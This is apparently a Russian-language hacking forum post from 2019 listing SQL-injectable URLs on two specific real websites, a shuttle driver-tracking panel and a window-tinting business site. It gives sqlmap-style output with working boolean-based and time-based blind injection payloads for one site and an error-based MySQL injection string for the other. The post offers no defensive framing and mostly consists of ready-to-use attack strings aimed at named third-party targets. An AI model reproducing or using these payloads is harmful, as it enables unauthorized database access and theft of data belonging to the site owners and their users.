16.03.2019, 16:20
|
|
Guest
Сообщений: n/a
Провел на форуме:
56255
Репутация:
2
|
|
way.com
Код:
Code:
https://shuttle.way.com/waypanel/drivers/track-drivers-by-parking.php?pid=844
Parameter: pid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pid=844' AND 3141=3141 AND 'gxfZ'='gxfZ
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: pid=844' AND SLEEP(5) AND 'tJKn'='tJKn
---
[INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
Код:
Code:
http://www.alicetinting.com.au/pop.php?ID=37 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7178766271,(SELECT (ELT(8597=8597,1))),0x716a707171,0x78))s), 8446744073709551610, 8446744073709551610)))
|
|
|
|